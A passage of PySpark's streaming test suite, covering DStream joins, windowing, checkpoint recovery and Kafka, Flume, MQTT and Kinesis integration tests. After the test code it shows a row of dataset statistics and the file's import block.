input2 = [[('b', 3), ('c', 4)]]
def func(a, b):
return a.join(b)
expected = [[('b', (2, 3))]]
self._test_func(input, func, expected, True, input2)
def test_left_outer_join(self):
input = [[('a', 1), ('b', 2)]]
input2 = [[('b', 3), ('c', 4)]]
def func(a, b):
return a.leftOuterJoin(b)
expected = [[('a', (1, None)), ('b', (2, 3))]]
self._test_func(input, func, expected, True, input2)
def test_right_outer_join(self):
input = [[('a', 1), ('b', 2)]]
input2 = [[('b', 3), ('c', 4)]]
def func(a, b):
return a.rightOuterJoin(b)
expected = [[('b', (2, 3)), ('c', (None, 4))]]
self._test_func(input, func, expected, True, input2)
def test_full_outer_join(self):
input = [[('a', 1), ('b', 2)]]
input2 = [[('b', 3), ('c', 4)]]
def func(a, b):
return a.fullOuterJoin(b)
expected = [[('a', (1, None)), ('b', (2, 3)), ('c', (None, 4))]]
self._test_func(input, func, expected, True, input2)
def test_update_state_by_key(self):
def updater(vs, s):
if not s:
s = []
s.extend(vs)
return s
input = [[('k', i)] for i in range(5)]
def func(dstream):
return dstream.updateStateByKey(updater)
expected = [[0], [0, 1], [0, 1, 2], [0, 1, 2, 3], [0, 1, 2, 3, 4]]
expected = [[('k', v)] for v in expected]
self._test_func(input, func, expected)
class WindowFunctionTests(PySparkStreamingTestCase):
timeout = 15
def test_window(self):
input = [range(1), range(2), range(3), range(4), range(5)]
def func(dstream):
return dstream.window(1.5, .5).count()
expected = [[1], [3], [6], [9], [12], [9], [5]]
self._test_func(input, func, expected)
def test_count_by_window(self):
input = [range(1), range(2), range(3), range(4), range(5)]
def func(dstream):
return dstream.countByWindow(1.5, .5)
expected = [[1], [3], [6], [9], [12], [9], [5]]
self._test_func(input, func, expected)
def test_count_by_window_large(self):
input = [range(1), range(2), range(3), range(4), range(5), range(6)]
def func(dstream):
return dstream.countByWindow(2.5, .5)
expected = [[1], [3], [6], [10], [15], [20], [18], [15], [11], [6]]
self._test_func(input, func, expected)
def test_count_by_value_and_window(self):
input = [range(1), range(2), range(3), range(4), range(5), range(6)]
def func(dstream):
return dstream.countByValueAndWindow(2.5, .5)
expected = [[1], [2], [3], [4], [5], [6], [6], [6], [6], [6]]
self._test_func(input, func, expected)
def test_group_by_key_and_window(self):
input = [[('a', i)] for i in range(5)]
def func(dstream):
return dstream.groupByKeyAndWindow(1.5, .5).mapValues(list)
expected = [[('a', [0])], [('a', [0, 1])], [('a', [0, 1, 2])], [('a', [1, 2, 3])],
[('a', [2, 3, 4])], [('a', [3, 4])], [('a', [4])]]
self._test_func(input, func, expected)
def test_reduce_by_invalid_window(self):
input1 = [range(3), range(5), range(1), range(6)]
d1 = self.ssc.queueStream(input1)
self.assertRaises(ValueError, lambda: d1.reduceByKeyAndWindow(None, None, 0.1, 0.1))
self.assertRaises(ValueError, lambda: d1.reduceByKeyAndWindow(None, None, 1, 0.1))
class StreamingContextTests(PySparkStreamingTestCase):
duration = 0.1
setupCalled = False
def _add_input_stream(self):
inputs = [range(1, x) for x in range(101)]
stream = self.ssc.queueStream(inputs)
self._collect(stream, 1, block=False)
def test_stop_only_streaming_context(self):
self._add_input_stream()
self.ssc.start()
self.ssc.stop(False)
self.assertEqual(len(self.sc.parallelize(range(5), 5).glom().collect()), 5)
def test_stop_multiple_times(self):
self._add_input_stream()
self.ssc.start()
self.ssc.stop(False)
self.ssc.stop(False)
def test_queue_stream(self):
input = [list(range(i + 1)) for i in range(3)]
dstream = self.ssc.queueStream(input)
result = self._collect(dstream, 3)
self.assertEqual(input, result)
def test_text_file_stream(self):
d = tempfile.mkdtemp()
self.ssc = StreamingContext(self.sc, self.duration)
dstream2 = self.ssc.textFileStream(d).map(int)
result = self._collect(dstream2, 2, block=False)
self.ssc.start()
for name in ('a', 'b'):
time.sleep(1)
with open(os.path.join(d, name), "w") as f:
f.writelines(["%d\n" % i for i in range(10)])
self.wait_for(result, 2)
self.assertEqual([list(range(10)), list(range(10))], result)
def test_binary_records_stream(self):
d = tempfile.mkdtemp()
self.ssc = StreamingContext(self.sc, self.duration)
dstream = self.ssc.binaryRecordsStream(d, 10).map(
lambda v: struct.unpack("10b", bytes(v)))
result = self._collect(dstream, 2, block=False)
self.ssc.start()
for name in ('a', 'b'):
time.sleep(1)
with open(os.path.join(d, name), "wb") as f:
f.write(bytearray(range(10)))
self.wait_for(result, 2)
self.assertEqual([list(range(10)), list(range(10))], [list(v[0]) for v in result])
def test_union(self):
input = [list(range(i + 1)) for i in range(3)]
dstream = self.ssc.queueStream(input)
dstream2 = self.ssc.queueStream(input)
dstream3 = self.ssc.union(dstream, dstream2)
result = self._collect(dstream3, 3)
expected = [i * 2 for i in input]
self.assertEqual(expected, result)
def test_transform(self):
dstream1 = self.ssc.queueStream([[1]])
dstream2 = self.ssc.queueStream([[2]])
dstream3 = self.ssc.queueStream([[3]])
def func(rdds):
rdd1, rdd2, rdd3 = rdds
return rdd2.union(rdd3).union(rdd1)
dstream = self.ssc.transform([dstream1, dstream2, dstream3], func)
self.assertEqual([2, 3, 1], self._take(dstream, 3))
def test_get_active(self):
self.assertEqual(StreamingContext.getActive(), None)
# Verify that getActive() returns the active context
self.ssc.queueStream([[1]]).foreachRDD(lambda rdd: rdd.count())
self.ssc.start()
self.assertEqual(StreamingContext.getActive(), self.ssc)
# Verify that getActive() returns None
self.ssc.stop(False)
self.assertEqual(StreamingContext.getActive(), None)
# Verify that if the Java context is stopped, then getActive() returns None
self.ssc = StreamingContext(self.sc, self.duration)
self.ssc.queueStream([[1]]).foreachRDD(lambda rdd: rdd.count())
self.ssc.start()
self.assertEqual(StreamingContext.getActive(), self.ssc)
self.ssc._jssc.stop(False)
self.assertEqual(StreamingContext.getActive(), None)
def test_get_active_or_create(self):
# Test StreamingContext.getActiveOrCreate() without checkpoint data
# See CheckpointTests for tests with checkpoint data
self.ssc = None
self.assertEqual(StreamingContext.getActive(), None)
def setupFunc():
ssc = StreamingContext(self.sc, self.duration)
ssc.queueStream([[1]]).foreachRDD(lambda rdd: rdd.count())
self.setupCalled = True
return ssc
# Verify that getActiveOrCreate() (w/o checkpoint) calls setupFunc when no context is active
self.setupCalled = False
self.ssc = StreamingContext.getActiveOrCreate(None, setupFunc)
self.assertTrue(self.setupCalled)
# Verify that getActiveOrCreate() retuns active context and does not call the setupFunc
self.ssc.start()
self.setupCalled = False
self.assertEqual(StreamingContext.getActiveOrCreate(None, setupFunc), self.ssc)
self.assertFalse(self.setupCalled)
# Verify that getActiveOrCreate() calls setupFunc after active context is stopped
self.ssc.stop(False)
self.setupCalled = False
self.ssc = StreamingContext.getActiveOrCreate(None, setupFunc)
self.assertTrue(self.setupCalled)
# Verify that if the Java context is stopped, then getActive() returns None
self.ssc = StreamingContext(self.sc, self.duration)
self.ssc.queueStream([[1]]).foreachRDD(lambda rdd: rdd.count())
self.ssc.start()
self.assertEqual(StreamingContext.getActive(), self.ssc)
self.ssc._jssc.stop(False)
self.setupCalled = False
self.ssc = StreamingContext.getActiveOrCreate(None, setupFunc)
self.assertTrue(self.setupCalled)
class CheckpointTests(unittest.TestCase):
setupCalled = False
@staticmethod
def tearDownClass():
# Clean up in the JVM just in case there has been some issues in Python API
jStreamingContextOption = StreamingContext._jvm.SparkContext.getActive()
if jStreamingContextOption.nonEmpty():
jStreamingContextOption.get().stop()
jSparkContextOption = SparkContext._jvm.SparkContext.get()
if jSparkContextOption.nonEmpty():
jSparkContextOption.get().stop()
def tearDown(self):
if self.ssc is not None:
self.ssc.stop(True)
if self.sc is not None:
self.sc.stop()
if self.cpd is not None:
shutil.rmtree(self.cpd)
def test_get_or_create_and_get_active_or_create(self):
inputd = tempfile.mkdtemp()
outputd = tempfile.mkdtemp() + "/"
def updater(vs, s):
return sum(vs, s or 0)
def setup():
conf = SparkConf().set("spark.default.parallelism", 1)
sc = SparkContext(conf=conf)
ssc = StreamingContext(sc, 0.5)
dstream = ssc.textFileStream(inputd).map(lambda x: (x, 1))
wc = dstream.updateStateByKey(updater)
wc.map(lambda x: "%s,%d" % x).saveAsTextFiles(outputd + "test")
wc.checkpoint(.5)
self.setupCalled = True
return ssc
# Verify that getOrCreate() calls setup() in absence of checkpoint files
self.cpd = tempfile.mkdtemp("test_streaming_cps")
self.setupCalled = False
self.ssc = StreamingContext.getOrCreate(self.cpd, setup)
self.assertFalse(self.setupCalled)
self.ssc.start()
def check_output(n):
while not os.listdir(outputd):
time.sleep(0.01)
time.sleep(1) # make sure mtime is larger than the previous one
with open(os.path.join(inputd, str(n)), 'w') as f:
f.writelines(["%d\n" % i for i in range(10)])
while True:
p = os.path.join(outputd, max(os.listdir(outputd)))
if '_SUCCESS' not in os.listdir(p):
# not finished
time.sleep(0.01)
continue
ordd = self.ssc.sparkContext.textFile(p).map(lambda line: line.split(","))
d = ordd.values().map(int).collect()
if not d:
time.sleep(0.01)
continue
self.assertEqual(10, len(d))
s = set(d)
self.assertEqual(1, len(s))
m = s.pop()
if n > m:
continue
self.assertEqual(n, m)
break
check_output(1)
check_output(2)
# Verify the getOrCreate() recovers from checkpoint files
self.ssc.stop(True, True)
time.sleep(1)
self.setupCalled = False
self.ssc = StreamingContext.getOrCreate(self.cpd, setup)
self.assertFalse(self.setupCalled)
self.ssc.start()
check_output(3)
# Verify that getOrCreate() uses existing SparkContext
self.ssc.stop(True, True)
time.sleep(1)
sc = SparkContext(SparkConf())
self.setupCalled = False
self.ssc = StreamingContext.getOrCreate(self.cpd, setup)
self.assertFalse(self.setupCalled)
self.assertTrue(self.ssc.sparkContext == sc)
# Verify the getActiveOrCreate() recovers from checkpoint files
self.ssc.stop(True, True)
time.sleep(1)
self.setupCalled = False
self.ssc = StreamingContext.getActiveOrCreate(self.cpd, setup)
self.assertFalse(self.setupCalled)
self.ssc.start()
check_output(4)
# Verify that getActiveOrCreate() returns active context
self.setupCalled = False
self.assertEqual(StreamingContext.getActiveOrCreate(self.cpd, setup), self.ssc)
self.assertFalse(self.setupCalled)
# Verify that getActiveOrCreate() uses existing SparkContext
self.ssc.stop(True, True)
time.sleep(1)
self.sc = SparkContext(SparkConf())
self.setupCalled = False
self.ssc = StreamingContext.getActiveOrCreate(self.cpd, setup)
self.assertFalse(self.setupCalled)
self.assertTrue(self.ssc.sparkContext == sc)
# Verify that getActiveOrCreate() calls setup() in absence of checkpoint files
self.ssc.stop(True, True)
shutil.rmtree(self.cpd) # delete checkpoint directory
time.sleep(1)
self.setupCalled = False
self.ssc = StreamingContext.getActiveOrCreate(self.cpd, setup)
self.assertTrue(self.setupCalled)
# Stop everything
self.ssc.stop(True, True)
class KafkaStreamTests(PySparkStreamingTestCase):
timeout = 20 # seconds
duration = 1
def setUp(self):
super(KafkaStreamTests, self).setUp()
kafkaTestUtilsClz = self.ssc._jvm.java.lang.Thread.currentThread().getContextClassLoader()\
.loadClass("org.apache.spark.streaming.kafka.KafkaTestUtils")
self._kafkaTestUtils = kafkaTestUtilsClz.newInstance()
self._kafkaTestUtils.setup()
def tearDown(self):
if self._kafkaTestUtils is not None:
self._kafkaTestUtils.teardown()
self._kafkaTestUtils = None
super(KafkaStreamTests, self).tearDown()
def _randomTopic(self):
return "topic-%d" % random.randint(0, 10000)
def _validateStreamResult(self, sendData, stream):
result = {}
for i in chain.from_iterable(self._collect(stream.map(lambda x: x[1]),
sum(sendData.values()))):
result[i] = result.get(i, 0) + 1
self.assertEqual(sendData, result)
def _validateRddResult(self, sendData, rdd):
result = {}
for i in rdd.map(lambda x: x[1]).collect():
result[i] = result.get(i, 0) + 1
self.assertEqual(sendData, result)
def test_kafka_stream(self):
"""Test the Python Kafka stream API."""
topic = self._randomTopic()
sendData = {"a": 3, "b": 5, "c": 10}
self._kafkaTestUtils.createTopic(topic)
self._kafkaTestUtils.sendMessages(topic, sendData)
stream = KafkaUtils.createStream(self.ssc, self._kafkaTestUtils.zkAddress(),
"test-streaming-consumer", {topic: 1},
{"auto.offset.reset": "smallest"})
self._validateStreamResult(sendData, stream)
def test_kafka_direct_stream(self):
"""Test the Python direct Kafka stream API."""
topic = self._randomTopic()
sendData = {"a": 1, "b": 2, "c": 3}
kafkaParams = {"metadata.broker.list": self._kafkaTestUtils.brokerAddress(),
"auto.offset.reset": "smallest"}
self._kafkaTestUtils.createTopic(topic)
self._kafkaTestUtils.sendMessages(topic, sendData)
stream = KafkaUtils.createDirectStream(self.ssc, [topic], kafkaParams)
self._validateStreamResult(sendData, stream)
@unittest.skipIf(sys.version >= "3", "long type not support")
def test_kafka_direct_stream_from_offset(self):
"""Test the Python direct Kafka stream API with start offset specified."""
topic = self._randomTopic()
sendData = {"a": 1, "b": 2, "c": 3}
fromOffsets = {TopicAndPartition(topic, 0): long(0)}
kafkaParams = {"metadata.broker.list": self._kafkaTestUtils.brokerAddress()}
self._kafkaTestUtils.createTopic(topic)
self._kafkaTestUtils.sendMessages(topic, sendData)
stream = KafkaUtils.createDirectStream(self.ssc, [topic], kafkaParams, fromOffsets)
self._validateStreamResult(sendData, stream)
@unittest.skipIf(sys.version >= "3", "long type not support")
def test_kafka_rdd(self):
"""Test the Python direct Kafka RDD API."""
topic = self._randomTopic()
sendData = {"a": 1, "b": 2}
offsetRanges = [OffsetRange(topic, 0, long(0), long(sum(sendData.values())))]
kafkaParams = {"metadata.broker.list": self._kafkaTestUtils.brokerAddress()}
self._kafkaTestUtils.createTopic(topic)
self._kafkaTestUtils.sendMessages(topic, sendData)
rdd = KafkaUtils.createRDD(self.sc, kafkaParams, offsetRanges)
self._validateRddResult(sendData, rdd)
@unittest.skipIf(sys.version >= "3", "long type not support")
def test_kafka_rdd_with_leaders(self):
"""Test the Python direct Kafka RDD API with leaders."""
topic = self._randomTopic()
sendData = {"a": 1, "b": 2, "c": 3}
offsetRanges = [OffsetRange(topic, 0, long(0), long(sum(sendData.values())))]
kafkaParams = {"metadata.broker.list": self._kafkaTestUtils.brokerAddress()}
address = self._kafkaTestUtils.brokerAddress().split(":")
leaders = {TopicAndPartition(topic, 0): Broker(address[0], int(address[1]))}
self._kafkaTestUtils.createTopic(topic)
self._kafkaTestUtils.sendMessages(topic, sendData)
rdd = KafkaUtils.createRDD(self.sc, kafkaParams, offsetRanges, leaders)
self._validateRddResult(sendData, rdd)
@unittest.skipIf(sys.version >= "3", "long type not support")
def test_kafka_rdd_get_offsetRanges(self):
"""Test Python direct Kafka RDD get OffsetRanges."""
topic = self._randomTopic()
sendData = {"a": 3, "b": 4, "c": 5}
offsetRanges = [OffsetRange(topic, 0, long(0), long(sum(sendData.values())))]
kafkaParams = {"metadata.broker.list": self._kafkaTestUtils.brokerAddress()}
self._kafkaTestUtils.createTopic(topic)
self._kafkaTestUtils.sendMessages(topic, sendData)
rdd = KafkaUtils.createRDD(self.sc, kafkaParams, offsetRanges)
self.assertEqual(offsetRanges, rdd.offsetRanges())
@unittest.skipIf(sys.version >= "3", "long type not support")
def test_kafka_direct_stream_foreach_get_offsetRanges(self):
"""Test the Python direct Kafka stream foreachRDD get offsetRanges."""
topic = self._randomTopic()
sendData = {"a": 1, "b": 2, "c": 3}
kafkaParams = {"metadata.broker.list": self._kafkaTestUtils.brokerAddress(),
"auto.offset.reset": "smallest"}
self._kafkaTestUtils.createTopic(topic)
self._kafkaTestUtils.sendMessages(topic, sendData)
stream = KafkaUtils.createDirectStream(self.ssc, [topic], kafkaParams)
offsetRanges = []
def getOffsetRanges(_, rdd):
for o in rdd.offsetRanges():
offsetRanges.append(o)
stream.foreachRDD(getOffsetRanges)
self.ssc.start()
self.wait_for(offsetRanges, 1)
self.assertEqual(offsetRanges, [OffsetRange(topic, 0, long(0), long(6))])
@unittest.skipIf(sys.version >= "3", "long type not support")
def test_kafka_direct_stream_transform_get_offsetRanges(self):
"""Test the Python direct Kafka stream transform get offsetRanges."""
topic = self._randomTopic()
sendData = {"a": 1, "b": 2, "c": 3}
kafkaParams = {"metadata.broker.list": self._kafkaTestUtils.brokerAddress(),
"auto.offset.reset": "smallest"}
self._kafkaTestUtils.createTopic(topic)
self._kafkaTestUtils.sendMessages(topic, sendData)
stream = KafkaUtils.createDirectStream(self.ssc, [topic], kafkaParams)
offsetRanges = []
def transformWithOffsetRanges(rdd):
for o in rdd.offsetRanges():
offsetRanges.append(o)
return rdd
# Test whether it is ok mixing KafkaTransformedDStream and TransformedDStream together,
# only the TransformedDstreams can be folded together.
stream.transform(transformWithOffsetRanges).map(lambda kv: kv[1]).count().pprint()
self.ssc.start()
self.wait_for(offsetRanges, 1)
self.assertEqual(offsetRanges, [OffsetRange(topic, 0, long(0), long(6))])
def test_topic_and_partition_equality(self):
topic_and_partition_a = TopicAndPartition("foo", 0)
topic_and_partition_b = TopicAndPartition("foo", 0)
topic_and_partition_c = TopicAndPartition("bar", 0)
topic_and_partition_d = TopicAndPartition("foo", 1)
self.assertEqual(topic_and_partition_a, topic_and_partition_b)
self.assertNotEqual(topic_and_partition_a, topic_and_partition_c)
self.assertNotEqual(topic_and_partition_a, topic_and_partition_d)
class FlumeStreamTests(PySparkStreamingTestCase):
timeout = 20 # seconds
duration = 1
def setUp(self):
super(FlumeStreamTests, self).setUp()
utilsClz = self.ssc._jvm.java.lang.Thread.currentThread().getContextClassLoader() \
.loadClass("org.apache.spark.streaming.flume.FlumeTestUtils")
self._utils = utilsClz.newInstance()
def tearDown(self):
if self._utils is not None:
self._utils.close()
self._utils = None
super(FlumeStreamTests, self).tearDown()
def _startContext(self, n, compressed):
# Start the StreamingContext and also collect the result
dstream = FlumeUtils.createStream(self.ssc, "localhost", self._utils.getTestPort(),
enableDecompression=compressed)
result = []
def get_output(_, rdd):
for event in rdd.collect():
if len(result) < n:
result.append(event)
dstream.foreachRDD(get_output)
self.ssc.start()
return result
def _validateResult(self, input, result):
# Validate both the header and the body
header = {"test": "header"}
self.assertEqual(len(input), len(result))
for i in range(0, len(input)):
self.assertEqual(header, result[i][0])
self.assertEqual(input[i], result[i][1])
def _writeInput(self, input, compressed):
# Try to write input to the receiver until success or timeout
start_time = time.time()
while True:
try:
self._utils.writeInput(input, compressed)
break
except:
if time.time() - start_time < self.timeout:
time.sleep(0.01)
else:
raise
def test_flume_stream(self):
input = [str(i) for i in range(1, 101)]
result = self._startContext(len(input), False)
self._writeInput(input, False)
self.wait_for(result, len(input))
self._validateResult(input, result)
def test_compressed_flume_stream(self):
input = [str(i) for i in range(1, 101)]
result = self._startContext(len(input), True)
self._writeInput(input, True)
self.wait_for(result, len(input))
self._validateResult(input, result)
class FlumePollingStreamTests(PySparkStreamingTestCase):
timeout = 20 # seconds
duration = 1
maxAttempts = 5
def setUp(self):
utilsClz = \
self.sc._jvm.java.lang.Thread.currentThread().getContextClassLoader() \
.loadClass("org.apache.spark.streaming.flume.PollingFlumeTestUtils")
self._utils = utilsClz.newInstance()
def tearDown(self):
if self._utils is not None:
self._utils.close()
self._utils = None
def _writeAndVerify(self, ports):
# Set up the streaming context and input streams
ssc = StreamingContext(self.sc, self.duration)
try:
addresses = [("localhost", port) for port in ports]
dstream = FlumeUtils.createPollingStream(
ssc,
addresses,
maxBatchSize=self._utils.eventsPerBatch(),
parallelism=5)
outputBuffer = []
def get_output(_, rdd):
for e in rdd.collect():
outputBuffer.append(e)
dstream.foreachRDD(get_output)
ssc.start()
self._utils.sendDatAndEnsureAllDataHasBeenReceived()
self.wait_for(outputBuffer, self._utils.getTotalEvents())
outputHeaders = [event[0] for event in outputBuffer]
outputBodies = [event[1] for event in outputBuffer]
self._utils.assertOutput(outputHeaders, outputBodies)
finally:
ssc.stop(False)
def _testMultipleTimes(self, f):
attempt = 0
while True:
try:
f()
break
except:
attempt += 1
if attempt >= self.maxAttempts:
raise
else:
import traceback
traceback.print_exc()
def _testFlumePolling(self):
try:
port = self._utils.startSingleSink()
self._writeAndVerify([port])
self._utils.assertChannelsAreEmpty()
finally:
self._utils.close()
def _testFlumePollingMultipleHosts(self):
try:
port = self._utils.startSingleSink()
self._writeAndVerify([port])
self._utils.assertChannelsAreEmpty()
finally:
self._utils.close()
def test_flume_polling(self):
self._testMultipleTimes(self._testFlumePolling)
def test_flume_polling_multiple_hosts(self):
self._testMultipleTimes(self._testFlumePollingMultipleHosts)
class MQTTStreamTests(PySparkStreamingTestCase):
timeout = 20 # seconds
duration = 1
def setUp(self):
super(MQTTStreamTests, self).setUp()
MQTTTestUtilsClz = self.ssc._jvm.java.lang.Thread.currentThread().getContextClassLoader() \
.loadClass("org.apache.spark.streaming.mqtt.MQTTTestUtils")
self._MQTTTestUtils = MQTTTestUtilsClz.newInstance()
self._MQTTTestUtils.setup()
def tearDown(self):
if self._MQTTTestUtils is not None:
self._MQTTTestUtils.teardown()
self._MQTTTestUtils = None
super(MQTTStreamTests, self).tearDown()
def _randomTopic(self):
return "topic-%d" % random.randint(0, 10000)
def _startContext(self, topic):
# Start the StreamingContext and also collect the result
stream = MQTTUtils.createStream(self.ssc, "tcp://" + self._MQTTTestUtils.brokerUri(), topic)
result = []
def getOutput(_, rdd):
for data in rdd.collect():
result.append(data)
stream.foreachRDD(getOutput)
self.ssc.start()
return result
def test_mqtt_stream(self):
"""Test the Python MQTT stream API."""
sendData = "MQTT demo for spark streaming"
topic = self._randomTopic()
result = self._startContext(topic)
def retry():
self._MQTTTestUtils.publishData(topic, sendData)
# Because "publishData" sends duplicate messages, here we should use > 0
self.assertTrue(len(result) > 0)
self.assertEqual(sendData, result[0])
# Retry it because we don't know when the receiver will start.
self._retry_or_timeout(retry)
def _retry_or_timeout(self, test_func):
start_time = time.time()
while True:
try:
test_func()
break
except:
if time.time() - start_time > self.timeout:
raise
time.sleep(0.01)
class KinesisStreamTests(PySparkStreamingTestCase):
def test_kinesis_stream_api(self):
# Don't start the StreamingContext because we cannot test it in Jenkins
kinesisStream1 = KinesisUtils.createStream(
self.ssc, "myAppNam", "mySparkStream",
"https://kinesis.us-west-2.amazonaws.com", "us-west-2",
InitialPositionInStream.LATEST, 2, StorageLevel.MEMORY_AND_DISK_2)
kinesisStream2 = KinesisUtils.createStream(
self.ssc, "myAppNam", "mySparkStream",
"https://kinesis.us-west-2.amazonaws.com", "us-west-2",
InitialPositionInStream.LATEST, 2, StorageLevel.MEMORY_AND_DISK_2,
"awsAccessKey", "awsSecretKey")
def test_kinesis_stream(self):
if not are_kinesis_tests_enabled:
sys.stderr.write(
"Skipped test_kinesis_stream (enable by setting environment variable %s=1"
% kinesis_test_environ_var)
return
import random
kinesisAppName = ("KinesisStreamTests-%d" % abs(random.randint(0, 10000000)))
kinesisTestUtilsClz = \
self.sc._jvm.java.lang.Thread.currentThread().getContextClassLoader() \
.loadClass("org.apache.spark.streaming.kinesis.KinesisTestUtils")
kinesisTestUtils = kinesisTestUtilsClz.newInstance()
try:
kinesisTestUtils.createStream()
aWSCredentials = kinesisTestUtils.getAWSCredentials()
stream = KinesisUtils.createStream(
self.ssc, kinesisAppName, kinesisTestUtils.streamName(),
kinesisTestUtils.endpointUrl(), kinesisTestUtils.regionName(),
InitialPositionInStream.LATEST, 10, StorageLevel.MEMORY_ONLY,
aWSCredentials.getAWSAccessKeyId(), aWSCredentials.getAWSSecretKey())
outputBuffer = []
def get_output(_, rdd):
for e in rdd.collect():
outputBuffer.append(e)
stream.foreachRDD(get_output)
self.ssc.start()
testData = [i for i in range(1, 11)]
expectedOutput = set([str(i) for i in testData])
start_time = time.time()
while time.time() - start_time < 120:
kinesisTestUtils.pushData(testData)
if expectedOutput == set(outputBuffer):
break
time.sleep(10)
self.assertEqual(expectedOutput, set(outputBuffer))
except:
import traceback
traceback.print_exc()
raise
finally:
self.ssc.stop(False)
kinesisTestUtils.deleteStream()
kinesisTestUtils.deleteDynamoDBTable(kinesisAppName)
# Search jar in the project dir using the jar name_prefix for both sbt build and maven build because
# the artifact jars are in different directories.
def search_jar(dir, name_prefix):
# We should ignore the following jars
ignored_jar_suffixes = ("javadoc.jar", "sources.jar", "test-sources.jar", "tests.jar")
jars = (glob.glob(os.path.join(dir, "target/scala-*/" + name_prefix + "-*.jar")) + # sbt build
glob.glob(os.path.join(dir, "target/" + name_prefix + "_*.jar"))) # maven build
return [jar for jar in jars if not jar.endswith(ignored_jar_suffixes)]
def search_kafka_assembly_jar():
SPARK_HOME = os.environ["SPARK_HOME"]
kafka_assembly_dir = os.path.join(SPARK_HOME, "external/kafka-assembly")
jars = search_jar(kafka_assembly_dir, "spark-streaming-kafka-assembly")
if not jars:
raise Exception(
("Failed to find Spark Streaming kafka assembly jar in %s. " % kafka_assembly_dir) +
"You need to build Spark with "
"'build/sbt assembly/assembly streaming-kafka-assembly/assembly' or "
"'build/mvn package' before running this test.")
elif len(jars) > 1:
raise Exception(("Found multiple Spark Streaming Kafka assembly JARs: %s; please "
"remove all but one") % (", ".join(jars)))
else:
return jars[0]
def search_flume_assembly_jar():
SPARK_HOME = os.environ["SPARK_HOME"]
flume_assembly_dir = os.path.join(SPARK_HOME, "external/flume-assembly")
jars = search_jar(flume_assembly_dir, "spark-streaming-flume-assembly")
if not jars:
raise Exception(
("Failed to find Spark Streaming Flume assembly jar in %s. " % flume_assembly_dir) +
"You need to build Spark with "
"'build/sbt assembly/assembly streaming-flume-assembly/assembly' or "
"'build/mvn package' before running this test.")
elif len(jars) > 1:
raise Exception(("Found multiple Spark Streaming Flume assembly JARs: %s; please "
"remove all but one") % (", ".join(jars)))
else:
return jars[0]
def search_mqtt_assembly_jar():
SPARK_HOME = os.environ["SPARK_HOME"]
mqtt_assembly_dir = os.path.join(SPARK_HOME, "external/mqtt-assembly")
jars = search_jar(mqtt_assembly_dir, "spark-streaming-mqtt-assembly")
if not jars:
raise Exception(
("Failed to find Spark Streaming MQTT assembly jar in %s. " % mqtt_assembly_dir) +
"You need to build Spark with "
"'build/sbt assembly/assembly streaming-mqtt-assembly/assembly' or "
"'build/mvn package' before running this test")
elif len(jars) > 1:
raise Exception(("Found multiple Spark Streaming MQTT assembly JARs: %s; please "
"remove all but one") % (", ".join(jars)))
else:
return jars[0]
def search_mqtt_test_jar():
SPARK_HOME = os.environ["SPARK_HOME"]
mqtt_test_dir = os.path.join(SPARK_HOME, "external/mqtt")
jars = glob.glob(
os.path.join(mqtt_test_dir, "target/scala-*/spark-streaming-mqtt-test-*.jar"))
if not jars:
raise Exception(
("Failed to find Spark Streaming MQTT test jar in %s. " % mqtt_test_dir) +
"You need to build Spark with "
"'build/sbt assembly/assembly streaming-mqtt/test:assembly'")
elif len(jars) > 1:
raise Exception(("Found multiple Spark Streaming MQTT test JARs: %s; please "
"remove all but one") % (", ".join(jars)))
else:
return jars[0]
def search_kinesis_asl_assembly_jar():
SPARK_HOME = os.environ["SPARK_HOME"]
kinesis_asl_assembly_dir = os.path.join(SPARK_HOME, "extras/kinesis-asl-assembly")
jars = search_jar(kinesis_asl_assembly_dir, "spark-streaming-kinesis-asl-assembly")
if not jars:
return None
elif len(jars) > 1:
raise Exception(("Found multiple Spark Streaming Kinesis ASL assembly JARs: %s; please "
"remove all but one") % (", ".join(jars)))
else:
return jars[0]
# Must be same as the variable and condition defined in KinesisTestUtils.scala
kinesis_test_environ_var = "ENABLE_KINESIS_TESTS"
are_kinesis_tests_enabled = os.environ.get(kinesis_test_environ_var) == '1'
if __name__ == "__main__":
kafka_assembly_jar = search_kafka_assembly_jar()
flume_assembly_jar = search_flume_assembly_jar()
mqtt_assembly_jar = search_mqtt_assembly_jar()
mqtt_test_jar = search_mqtt_test_jar()
kinesis_asl_assembly_jar = search_kinesis_asl_assembly_jar()
if kinesis_asl_assembly_jar is None:
kinesis_jar_present = False
jars = "%s,%s,%s,%s" % (kafka_assembly_jar, flume_assembly_jar, mqtt_assembly_jar,
mqtt_test_jar)
else:
kinesis_jar_present = True
jars = "%s,%s,%s,%s,%s" % (kafka_assembly_jar, flume_assembly_jar, mqtt_assembly_jar,
mqtt_test_jar, kinesis_asl_assembly_jar)
os.environ["PYSPARK_SUBMIT_ARGS"] = "--jars %s pyspark-shell" % jars
testcases = [BasicOperationTests, WindowFunctionTests, StreamingContextTests, CheckpointTests,
KafkaStreamTests, FlumeStreamTests, FlumePollingStreamTests, MQTTStreamTests]
if kinesis_jar_present is True:
testcases.append(KinesisStreamTests)
elif are_kinesis_tests_enabled is False:
sys.stderr.write("Skipping all Kinesis Python tests as the optional Kinesis project was "
"not compiled into a JAR. To run these tests, "
"you need to build Spark with 'build/sbt -Pkinesis-asl assembly/assembly "
"streaming-kinesis-asl-assembly/assembly' or "
"'build/mvn -Pkinesis-asl package' before running this test.")
else:
raise Exception(
("Failed to find Spark Streaming Kinesis assembly jar in %s. "
% kinesis_asl_assembly_dir) +
"You need to build Spark with 'build/sbt -Pkinesis-asl "
"assembly/assembly streaming-kinesis-asl-assembly/assembly'"
"or 'build/mvn -Pkinesis-asl package' before running this test.")
sys.stderr.write("Running tests: %s \n" % (str(testcases)))
for testcase in testcases:
sys.stderr.write("[Running %s]\n" % (testcase))
tests = unittest.TestLoader().loadTestsFromTestCase(testcase)
if xmlrunner:
unittest.main(tests, verbosity=3,
testRunner=xmlrunner.XMLTestRunner(output='target/test-reports'))
else:
unittest.TextTestRunner(verbosity=3).run(tests)
| 38.226998 | 100 | 0.592239 |
import glob
import os
import sys
from itertools import chain
import time
import operator
import tempfile
import random
import struct
import shutil
from functools import reduce
try:
import xmlrunner
except ImportError:
xmlrunner = None
if sys.version_info[:2] <= (2, 6):
try:
import unittest2 as unittest
except ImportError:
sys.stderr.write('Please install unittest2 to test with Python 2.6 or earlier')
sys.exit(1)
else:
import unittest
from pyspark.context import SparkConf, SparkContext, RDD
from pyspark.storagelevel import StorageLevel
from pyspark.streaming.context import StreamingContext
from pyspark.streaming.kafka import Broker, KafkaUtils, OffsetRange, TopicAndPartition
from pyspark.streaming.flume import FlumeUtils
from pyspark.streaming.mqtt import MQTTUtils
